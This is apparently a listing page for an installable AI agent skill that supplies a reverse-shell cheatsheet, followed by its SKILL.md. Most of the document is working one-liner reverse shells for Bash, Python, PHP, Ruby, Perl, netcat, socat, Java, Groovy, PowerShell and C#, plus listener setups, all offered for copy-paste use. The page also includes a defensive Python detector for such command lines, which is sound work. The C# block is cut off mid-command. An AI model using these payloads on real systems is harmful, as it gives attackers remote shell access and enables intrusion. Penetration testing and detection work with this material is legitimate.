
Reverse Shell Techniques
Quick copy-paste reverse-shell payload and listener references for use during authorized security assessments or defensive hardening research.
Overview
Reverse Shell Techniques is an agent skill for the Ship phase that supplies listener setups and 20+ language one-liner reverse-shell payloads for authorized security testing and defensive study.
Install
npx skills add https://github.com/yaklang/hack-skills --skill reverse-shell-techniques
What is this skill?
- Copy-paste one-liner reverse shells for 20+ languages and tools with ATTACKER/PORT placeholders
- Listener setup recipes for netcat, rlwrap netcat, and socat PTY listeners
- Bash, Python3, PHP, Ruby, and additional runtime variants in a single cheatsheet
- Supplementary reference aligned with the reverse-shell-techniques SKILL.md workflow
- Designed for repeatable use in lab and authorized engagement notes
- 20+ languages and tools covered in the one-liner cheatsheet
- ATTACKER and PORT placeholders for parameterized payloads
- Multiple listener variants including netcat, rlwrap netcat, and socat PTY
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are validating a finding or studying RCE paths but do not want to reconstruct shell one-liners and listener commands from memory across many runtimes.
Who is it for?
Developers and security testers with explicit permission who need fast, accurate reverse-shell syntax across common stacks during reviews or training.
Skip if: Unauthorized targeting of systems you do not own; casual indie shipping with no security testing scope or legal authorization.
When should I use this skill?
You need copy-paste reverse-shell payloads or listener commands during authorized security assessments, labs, or defensive hardening research.
What do I get? / Deliverables
You get ready-to-parameterize listener and payload snippets you can drop into authorized lab or engagement notes and then trace back to hardening tasks.
- Parameterized listener command for your PORT
- Runtime-specific reverse-shell one-liner for ATTACKER/PORT
- Engagement notes linking payload choice to mitigations
Journey fit
Reverse-shell patterns are classic post-exploitation checks you validate while hardening and testing systems before and after release. The Security subphase covers penetration testing, exploit validation, and understanding attacker techniques to fix misconfigurations and injection paths.
How it compares
Use as a focused payload cheatsheet, not as a full MCP exploit framework or automated scanner.
Common Questions / FAQ
Who is reverse-shell-techniques for?
It is for builders and security practitioners doing authorized tests, CTF practice, or defensive research who need concise reverse-shell and listener examples across many languages.
When should I use reverse-shell-techniques?
Use it in Ship security work when reproducing shell callbacks in a lab, documenting exploit paths for a report, or teaching what to detect in production egress and process monitoring.
Is reverse-shell-techniques safe to install?
The skill is offensive-security reference content; review the Security Audits panel on this page, keep use inside authorized scopes, and never run payloads against systems without permission.
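The FAQ above names process monitoring as one place to detect shell callbacks. As an added example (not part of the skill or its SKILL.md), this Python code flags process command lines that carry the constructs the cheatsheet's payload families depend on; the rule names, the record format and the sample records are constructed for illustration.

```python
import re

# Rule name -> pattern over one process command line. Each rule keys on the
# construct a payload family in the cheatsheet depends on, so changing the
# address, port or shell path does not evade it. Rule names are made up here.
RULES = {
    "dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/[^\s/]+/\d+"),
    "netcat_exec_flag": re.compile(r"\b(?:nc|ncat|netcat)\b(?=.*\s-e\s)"),
    "fifo_into_netcat": re.compile(r"\bmkfifo\s+\S+.*\|\s*(?:nc|ncat|netcat)\b"),
    "socat_exec_to_remote": re.compile(
        r"\bsocat\b(?=.*\bEXEC:)(?=.*\b(?:TCP|OPENSSL):[^\s,]+:\d+)"),
    "interpreter_socket_stdio": re.compile(
        r"\b(?:python[0-9.]*|perl|ruby|php)\b.*"
        r"(?:socket\.socket|fsockopen|TCPSocket|IO::Socket)"
        r".*(?:dup2|<&|fdopen|reopen|proc_open)"),
    "powershell_tcpclient_iex": re.compile(
        r"Net\.Sockets\.TCPClient.*\biex\b", re.IGNORECASE),
}

def classify(cmdline):
    """Return the sorted names of every rule that matches a command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(records):
    """records: 'pid<TAB>user<TAB>cmdline' lines. Returns [(pid, user, rules)]
    for the lines that matched at least one rule."""
    hits = []
    for rec in records:
        pid, user, cmdline = rec.split("\t", 2)
        rules = classify(cmdline)
        if rules:
            hits.append((int(pid), user, rules))
    return hits

# Constructed process-execution records (192.0.2.10 is a documentation address).
SAMPLE = [
    "4101\twww-data\tbash -c bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "4102\twww-data\tsh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f",
    "4103\tdeploy\tnc -zv db.internal 5432",
    "4104\ttomcat\tsocat TCP:192.0.2.10:4444 EXEC:bash,pty,stderr,setsid,sigint,sane",
    "4105\tdeploy\tpython3 -c import socket; print(socket.gethostname())",
    "4106\twww-data\tphp -r $sock=fsockopen(\"192.0.2.10\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");",
    "4107\troot\tsocat TCP-LISTEN:8080,fork TCP:127.0.0.1:80",
]

if __name__ == "__main__":
    for pid, user, rules in scan(SAMPLE):
        print(pid, user, ",".join(rules))
```

Records 4103, 4105 and 4107 are benign uses of the same tools and produce no hit, which is the property to preserve when tuning these patterns against real process telemetry.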
SKILL.md - Reverse Shell Techniques
# REVERSE SHELL CHEATSHEET

> Supplementary reference for [reverse-shell-techniques](./SKILL.md). Replace `ATTACKER` with your IP and `PORT` with your listener port.

## Listener Setup

```bash
nc -lvnp PORT  # Basic netcat listener
rlwrap nc -lvnp PORT  # With readline support
socat file:`tty`,raw,echo=0 TCP-LISTEN:PORT  # Full PTY listener
```

---

## Bash

```bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1
bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'
0<&196;exec 196<>/dev/tcp/ATTACKER/PORT; bash <&196 >&196 2>&196
```

## Python / Python3

```python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
```

## PHP

```bash
php -r '$sock=fsockopen("ATTACKER",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("ATTACKER",PORT);$proc=proc_open("sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
```

## Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("ATTACKER",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e'exit if fork;c=TCPSocket.new("ATTACKER",PORT);loop{c.gets.chomp!;(exit! if $_=="exit");STDOUT.reopen(c);STDERR.reopen(c);STDIN.reopen(c);system($_)}'
```

## Perl

```bash
perl -e 'use Socket;$i="ATTACKER";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ATTACKER:PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

## Netcat

```bash
nc -e /bin/sh ATTACKER PORT
nc -e /bin/bash ATTACKER PORT
# Without -e (OpenBSD nc)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER PORT >/tmp/f
# ncat
ncat ATTACKER PORT -e /bin/bash
ncat --ssl ATTACKER PORT -e /bin/bash
```

## Socat

```bash
socat TCP:ATTACKER:PORT EXEC:bash,pty,stderr,setsid,sigint,sane
socat TCP:ATTACKER:PORT EXEC:'bash -li',pty,stderr,setsid,sigint,sane
socat OPENSSL:ATTACKER:PORT,verify=0 EXEC:/bin/sh
```

## Java

```java
Runtime r = Runtime.getRuntime();
Process p = r.exec("/bin/bash -c bash$IFS-i>&/dev/tcp/ATTACKER/PORT<&1");
```

```bash
# Java one-liner (via bash)
r = Runtime.getRuntime()
r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"})
```

## Groovy

```groovy
String host="ATTACKER";int port=PORT;String cmd="bash";Process p=["bash","-c",cmd+" -i >& /dev/tcp/"+host+"/"+port+" 0>&1"].execute();
```

## PowerShell

```powershell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$t=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($t);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
```

## C# (via PowerShell)

```powershell
# Compile and execute C# reverse shell
$code = @"
using System;using System.Net.Sockets;using System.Diagnostics;using System.IO;
class S{static void Main(){TcpClient c=new TcpClient("ATTACKER",PORT);Stream s=c.GetStream();Process p=new Process();p.StartInfo.FileName="cmd.exe";p.StartInfo.RedirectStandardInput=true;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.UseShellExecute=false;p.Start();StreamWriter w=new StreamWriter(s);w.AutoFlush=true;StreamReader r=new StreamReader(s);while(true){w.Write("PS>");string cmd=r.ReadLine();if(cmd=="exit")break;p.StandardInput.WriteLine(cmd);w.Write(p.StandardOutput.ReadLine());}}}
"@
Add-Type -Type
```